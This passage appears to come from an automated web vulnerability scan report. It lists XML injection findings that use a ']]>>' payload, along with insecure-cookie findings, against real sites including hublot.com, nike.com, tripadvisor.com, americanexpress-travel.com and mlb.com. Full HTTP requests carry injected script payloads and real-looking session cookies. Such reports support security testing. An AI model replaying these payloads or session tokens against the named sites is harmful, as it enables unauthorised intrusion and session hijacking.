...[SNIP]...
8.217. http://vox-static.liverail.com/swf/v4/admanager.swf [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://vox-static.liverail.com
Path:   /swf/v4/admanager.swf

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /swf/v4/admanager.swf]]>> HTTP/1.1
Host: vox-static.liverail.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://static.eplayer.performgroup.com/ptvFlash/eplayer2/Eplayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lr_uid=17200647; lr_uds=a%3A1%3A%7Bi%3A1001%3Bi%3A1315103266%3B%7D

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: B8DCACD52CC872F9
x-amz-id-2: eD3+MfJNm9RK5Ha6SF/WckAjx8rD2HG4LmYJxkfErEws2H5jq8rqtTyhvCw1R4vW
Content-Type: application/xml
Server: AmazonS3
Date: Sun, 02 Oct 2011 23:51:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>B8DCACD52CC872F9</RequestId><HostId>eD3+MfJNm9RK5Ha6SF/WckAjx8rD2HG4LmYJxkfErEws2H5jq8
...[SNIP]...
8.218. http://wac.edgecastcdn.net/800003/origin.edgecast.com/cx/cdx10b.js [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://wac.edgecastcdn.net
Path:   /800003/origin.edgecast.com/cx/cdx10b.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /800003]]>>/origin.edgecast.com/cx/cdx10b.js?rnd=9808656215 HTTP/1.1
Host: wac.edgecastcdn.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/cacheable/cedexis/radar.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:28:30 GMT
Server: ECS (sjo/5279)
Content-Length: 345

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...
8.219. http://wac.edgecastcdn.net/800003/origin.edgecast.com/cx/cdx10b.js [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://wac.edgecastcdn.net
Path:   /800003/origin.edgecast.com/cx/cdx10b.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /800003/origin.edgecast.com]]>>/cx/cdx10b.js?rnd=9808656215 HTTP/1.1
Host: wac.edgecastcdn.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/cacheable/cedexis/radar.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:28:30 GMT
Server: ECS (sjo/527A)
Content-Length: 345

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...
8.220. http://www.hublot.com/en/cmds/stats.xml.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.hublot.com
Path:   /en/cmds/stats.xml.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

POST /en]]>>/cmds/stats.xml.php HTTP/1.1
Host: www.hublot.com
Proxy-Connection: keep-alive
Content-Length: 9
Origin: http://www.hublot.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
content-type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.hublot.com/site/loader.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4ph3147ql3ijri58if992avst5; DP_WEBSITE_LANGUAGE=en; Languages=http://www.hublot.com/en/; DP_WEBSITE_24H_STAT=1317599916; DP_WEBSITE_MONTH_STAT=10.11; DP_WEBSITE_VISITOR_STAT_NEW=1317599916; __utma=1.141818197.1317599917.1317599917.1317599917.1; __utmc=1; __utmz=1.1317599917.1.1.utmcsr=manutd.com|utmccn=(referral)|utmcmd=referral|utmcct=/Search-Results.aspx

CMD=TIMER

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 229
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 03 Oct 2011 00:31:19 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /en]]&gt;&gt;/cmds/stats.xml.php was not found on this server.</p>
...[SNIP]...
8.221. http://www.hublot.com/en/cmds/stats.xml.php [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.hublot.com
Path:   /en/cmds/stats.xml.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

POST /en/cmds]]>>/stats.xml.php HTTP/1.1
Host: www.hublot.com
Proxy-Connection: keep-alive
Content-Length: 9
Origin: http://www.hublot.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
content-type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.hublot.com/site/loader.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4ph3147ql3ijri58if992avst5; DP_WEBSITE_LANGUAGE=en; Languages=http://www.hublot.com/en/; DP_WEBSITE_24H_STAT=1317599916; DP_WEBSITE_MONTH_STAT=10.11; DP_WEBSITE_VISITOR_STAT_NEW=1317599916; __utma=1.141818197.1317599917.1317599917.1317599917.1; __utmc=1; __utmz=1.1317599917.1.1.utmcsr=manutd.com|utmccn=(referral)|utmcmd=referral|utmcct=/Search-Results.aspx

CMD=TIMER

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 229
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 03 Oct 2011 00:31:23 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /en/cmds]]&gt;&gt;/stats.xml.php was not found on this server.</p>
...[SNIP]...
8.222. http://www.hublot.com/en/cmds/stats.xml.php [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.hublot.com
Path:   /en/cmds/stats.xml.php

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

POST /en/cmds/stats.xml.php]]>> HTTP/1.1
Host: www.hublot.com
Proxy-Connection: keep-alive
Content-Length: 9
Origin: http://www.hublot.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
content-type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.hublot.com/site/loader.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4ph3147ql3ijri58if992avst5; DP_WEBSITE_LANGUAGE=en; Languages=http://www.hublot.com/en/; DP_WEBSITE_24H_STAT=1317599916; DP_WEBSITE_MONTH_STAT=10.11; DP_WEBSITE_VISITOR_STAT_NEW=1317599916; __utma=1.141818197.1317599917.1317599917.1317599917.1; __utmc=1; __utmz=1.1317599917.1.1.utmcsr=manutd.com|utmccn=(referral)|utmcmd=referral|utmcct=/Search-Results.aspx

CMD=TIMER

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 231
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 03 Oct 2011 00:31:27 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /site/cmds/stats.xml.php]]&gt;&gt; was not found on this server.</p>
...[SNIP]...
8.223. http://www.nike.com/nikefootball/home/twitterfeed [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.nike.com
Path:   /nikefootball/home/twitterfeed

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /nikefootball/home/twitterfeed]]>>?locale=en_US HTTP/1.1
Host: www.nike.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nike.com/nikefootball/home/?locale=en_US&ref=http%3A%2F%2Fwww.manutd.com%2FSearch-Results.aspx%3Fqs%3Dmanutd_frontend%26catTxt%3D%26searchText%3Dxss75931%253Cscript%253Ealert(document.location)%253C%2Fscript%253E14fb8fbf954
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AKNIKE=0; s_sv_sid=524830605105; NIKE_COMMERCE_COUNTRY=US; NIKE_COMMERCE_LANG_LOCALE=en_US; NIKE_COUNTRY=USA; NIKE_LANG_LOCALE=en_US; s_cc=true; s_ref=http%3A%2F%2Fwww.manutd.com%2FSearch-Results.aspx%3Fqs%3Dmanutd_frontend%26catTxt%3D%26searchText%3Dxss75931%253Cscript%253Ealert(document.location)%253C%2Fscript%253E14fb8fbf954; s_sq=%5B%5BB%5D%5D; s_sv_112_s1=1@16@a//1317599910141; s_sv_112_p1=1@37@d/7125/7124/7123/7122/7121&s/7126&e/3

Response

HTTP/1.1 200 OK
Server: Apache
X-Swooshlet: 226103.0 app-brand-0
Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
Content-Length: 64614
Cache-Control: max-age=893
Expires: Mon, 03 Oct 2011 00:46:43 GMT
Date: Mon, 03 Oct 2011 00:31:50 GMT
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equ
...[SNIP]...
<!-- SITEXML -->
...[SNIP]...
8.224. http://www.tripadvisor.com/Commerce [src parameter]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.tripadvisor.com
Path:   /Commerce

Issue detail

The src parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the src parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /Commerce?p=BookingCom&src=32448753]]>>&geo=258705&matchID=1&from=HotelDateSearch_SmartDeals&area=QC_Inline&slot=4&cnt=6&oos=4&silo=677&bucket=1625&ttype=Hotel&inMonth=10%202011&inDay=14&outMonth=10%202011&outDay=16&adults=NaN&pid=4799 HTTP/1.1
Host: www.tripadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=635C14B6E6425746; TAUnique=%1%enc%3AApKTEaYI6mNVaPDGh0MhGA7WhW0nFykhd5HXfiPeVIfT5BsMYvhPlw%3D%3D; BEPIN=%1%132c736d105%3Bbak14b%3A7724%3Brev03b%3A8754%3Bbak02b%3A5465%3Bmed02b%3A8739%3B; CM=%1%sh%2C%2C-1%7CWShadeSeen%2C%2C-1%7C; TAReturnTo=%1%%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html; TACds=C.2.11007.0.2011-10-02; TATravelInfo=V2*A.2*MG.-1*HP.2*FL.3; TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.4*MC.11893*LS.HotelCheckRates*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*FS.0*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*TFT.5*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.hotwire%5C.com%2Fhotel%2Fdetails%5C.jsp%3FactionType%3D2%26inputId%3Dhotel-results%26searchId%3D6111849947%26selectedSolutionId%3D135420317134%26selectedPGoodId%3D236179701665*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals-a_checkin%5C.10%252F9%252F2011-qbos-a_adults%5C.1-m11893-a_checkout%5C.10%252F16%252F2011*FS.37*FBH.6*TRA.true*LL.971923*LD.60745*EWS.SmartDeals; ServerPool=T

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:06:14 GMT
Server: Apache
pragma: no-cache
cache-control: no-cache,no-store,must-revalidate
expires: 0
Set-Cookie: TATravelInfo=V2*AY.2011*AM.10*AD.14*DY.2011*DM.10*DD.16*A.2*MG.-1*HP.2*FL.1*RVL.258705_275; Domain=.tripadvisor.com; Expires=Thu, 30-Sep-2021 01:06:14 GMT; Path=/
Set-Cookie: TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.21*MC.11893*LS.Redirect*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*FS.22*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*CU.USD*TFT.5*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.hotwire%5C.com%2Fhotel%2Fdetails%5C.jsp%3FactionType%3D2%26inputId%3Dhotel-results%26searchId%3D6111849947%26selectedSolutionId%3D135420317134%26selectedPGoodId%3D236179701665*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals-a_checkin%5C.10%252F9%252F2011-qbos-a_adults%5C.1-m11893-a_checkout%5C.10%252F16%252F2011*FS.37*FBH.6*TRA.true*LL.4139280*LD.258705*EWS.CheckMore; Domain=.tripadvisor.com; Path=/
Set-Cookie: ServerPool=A; Domain=.tripadvisor.com; Path=/
Set-Cookie: PassThruUrlArgs=null; Domain=.tripadvisor.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 4496
Connection: close
Content-Type: text/html;charset=UTF-8

<html xmlns:cmswindow="http://xml.apache.org/xalan/java/com.TripResearch.object.api.TAWindow"><head><META http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="refresh" conten
...[SNIP]...
9. SSL cookie without secure flag set  previous  next
There are 8 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

9.1. https://go.americanexpress-travel.com/SSOAuthenticateResponse.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://go.americanexpress-travel.com
Path:   /SSOAuthenticateResponse.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /SSOAuthenticateResponse.do?Service=AMEX&leavingDate=10/04/11&returningDate=10/07/11&searchMode=city&city=Boston,%20United%20States&cityCountryCode=&hotelName=&adults=1&?Service=AMEX&WA1=03010&WA2=%EF%BF%BDid&WA4=%EF%BF%BDid&cmpid=af-ctn-af000063&widgetid=ratefind-hot&SSORequestPath=/hotel/HotelCobrand.do&stk=null&mrk=null&mck=0&tpg=null&mrt=null&crd=null&mrp=null&ecd=null&emg=null HTTP/1.1
Host: go.americanexpress-travel.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://axptravel.americanexpress.com/consumertravel/customlogin.do?clientid=ACH-ONLINE&target=https://go.americanexpress-travel.com/SSOAuthenticateResponse.do%3fService%3DAMEX%26leavingDate%3D10%2F04%2F11%26returningDate%3D10%2F07%2F11%26searchMode%3Dcity%26city%3DBoston%2C%2520United%2520States%26cityCountryCode%3D%26hotelName%3D%26adults%3D1%26%3FService%3DAMEX%26WA1%3D03010%26WA2%3D%25EF%25BF%25BDid%26WA4%3D%25EF%25BF%25BDid%26cmpid%3Daf-ctn-af000063%26widgetid%3Dratefind-hot%26SSORequestPath%3D/hotel/HotelCobrand.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tyrg1st=5CE502CBA48A0513; TUID=987675b9-11f8-46ee-8be4-90a9f5cad5fa; JSID=F117AC921CCE045ED73E1F0312D428B7.p0716; JSESSIONID=F117AC921CCE045ED73E1F0312D428B7.p0716; Service=AMEX; SID=T0067005500193032003110310400015612061

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 03 Oct 2011 00:16:09 GMT
Server: Apache
Set-Cookie: JSESSIONID=90DF1362B8BE0812CA054723BD79F759.p0716; Path=/
Location: https://go.americanexpress-travel.com/hotel/HotelCobrand.do?Service=AMEX&leavingDate=10/04/11&returningDate=10/07/11&searchMode=city&city=Boston,%20United%20States&cityCountryCode=&hotelName=&adults=1&?Service=AMEX&WA1=03010&WA2=%EF%BF%BDid&WA4=%EF%BF%BDid&cmpid=af-ctn-af000063&widgetid=ratefind-hot&SSORequestPath=/hotel/HotelCobrand.do&stk=null&mrk=null&mck=0&tpg=null&mrt=null&crd=null&mrp=null&ecd=null&emg=null
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=ISO-8859-1

9.2. https://go.americanexpress-travel.com/hotel/HotelAvailability.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://go.americanexpress-travel.com
Path:   /hotel/HotelAvailability.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hotel/HotelAvailability.do?SEQ=1317600834023922011 HTTP/1.1
Host: go.americanexpress-travel.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://go.americanexpress-travel.com/hotel/HotelCobrand.do?Service=AMEX&leavingDate=10/04/11&returningDate=10/07/11&searchMode=city&city=Boston,%20United%20States&cityCountryCode=&hotelName=&adults=1&?Service=AMEX&WA1=03010&WA2=%EF%BF%BDid&WA4=%EF%BF%BDid&cmpid=af-ctn-af000063&widgetid=ratefind-hot&SSORequestPath=/hotel/HotelCobrand.do&stk=null&mrk=null&mck=0&tpg=null&mrt=null&crd=null&mrp=null&ecd=null&emg=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tyrg1st=5CE502CBA48A0513; TUID=987675b9-11f8-46ee-8be4-90a9f5cad5fa; JSID=F117AC921CCE045ED73E1F0312D428B7.p0716; Service=AMEX; SID=T0067005500193032003110310400015612061; JSESSIONID=F117AC921CCE045ED73E1F0312D428B7.p0716

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 03 Oct 2011 00:16:17 GMT
Server: Apache
Set-Cookie: JSESSIONID=14DD10D7D5064DF95146A9A1D7FADBBB.p0716; Expires=Thu, 01-Jan-1970 00:00:10 GMT
Location: https://go.americanexpress-travel.com/hotel/HotelAvailability.do?SEQ=1317600834023922011
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

9.3. https://go.americanexpress-travel.com/hotel/HotelCobrand.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://go.americanexpress-travel.com
Path:   /hotel/HotelCobrand.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hotel/HotelCobrand.do;jsessionid=959CC77E68C7D0C1E45369CF857BC3F1.p0716?Service=AMEX&leavingDate=10/04/11&returningDate=10/07/11&searchMode=city&city=Boston,%20United%20States&cityCountryCode=&hotelName=&adults=1&?Service=AMEX&WA1=03010&WA2=%EF%BF%BDid&WA4=%EF%BF%BDid&cmpid=af-ctn-af000063&widgetid=ratefind-hot HTTP/1.1
Host: go.americanexpress-travel.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=amex&grp=21&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B206380952%3B28845483%3Bq%3Fhttp%3A%2F%2Fgo.americanexpress-travel.com%2Fhotel%2FHotelCobrand.do%3FService%3DAMEX%26leavingDate%3D%24%7BdepartureDate%3Ad%3A%22mm%2Fdd%2Fyy%22%7D%26returningDate%3D%24%7BreturnDate%3Ad%3A%22mm%2Fdd%2Fyy%22%7D%26searchMode%3Dcity%26city%3D%24%7Bcity%7D%2C%2520%24%7Bcountryn%7D%26cityCountryCode%3D%26hotelName%3D%26adults%3D%24%7Badults%7D%26%3FService%3DAMEX%26WA1%3D03010%26WA2%3D%25eaid%26WA4%3D%25ecid%26cmpid%3Daf-ctn-af000063%26widgetid%3Dratefind-hot&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=141&pos=2&aii=2943600b-8719-4374-99f1-66c3d37bf8d3&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tyrg1st=5CE502CBA48A0513; JSID=959CC77E68C7D0C1E45369CF857BC3F1.p0716; TUID=987675b9-11f8-46ee-8be4-90a9f5cad5fa; JSESSIONID=959CC77E68C7D0C1E45369CF857BC3F1.p0716; Service=AMEX

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:41 GMT
Server: Apache
Set-Cookie: JSESSIONID=F117AC921CCE045ED73E1F0312D428B7.p0716; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7238

<!-- PAGE: TimeKeeper -->
<link rel="icon" href="https://axptravel.americanexpress.com/ctnwt/favicon.ico"/>
<link rel="shortcut icon" href="https://axptravel.americanexpress.com/ctnwt/favicon.ico"/>


...[SNIP]...
9.4. https://secure.mlb.com/resetPassword.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.mlb.com
Path:   /resetPassword.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /resetPassword.do HTTP/1.1
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 94
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: secure.mlb.com
Cookie: s_cc=true; SESSION_1=wf_flowId%3D%3D%3Dregistration.forgottenpassword%7Ewf_c_id%3D%3D%3D%22%3E%3CSCRIPT%3Edocument.title%3D1317599208257014%3C%2FSCRIPT%3E%3C%22%7Estage%3D%3D%3D2%7EflowId%3D%3D%3Dregistration.forgottenpassword; stUtil_cookie=1%7C%7C9620647761317598889493; s_sq=%5B%5BB%5D%5D

uri=%2Faccount%2Fforgot_password.jsp&emailAddress=*%2F%0Adocument.title%3D1317599291294048%2F*

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Date: Sun, 02 Oct 2011 23:48:21 GMT
Content-type: text/html;charset=utf-8
Set-cookie: SESSION_1=wf_flowId%3D%3D%3Dregistration.forgottenpassword%7Ewf_c_id%3D%3D%3D%22%3E%3CSCRIPT%3Edocument.title%3D1317599208257014%3C%2FSCRIPT%3E%3C%22%7Estage%3D%3D%3D2%7EflowId%3D%3D%3Dregistration.forgottenpassword; Domain=.mlb.com; Path=/
Content-Length: 76221


                       
...[SNIP]...
9.5. https://secure.mlb.com/shared/scripts/bam/bam.env.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.mlb.com
Path:   /shared/scripts/bam/bam.env.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shared/scripts/bam/bam.env.jsp HTTP/1.1
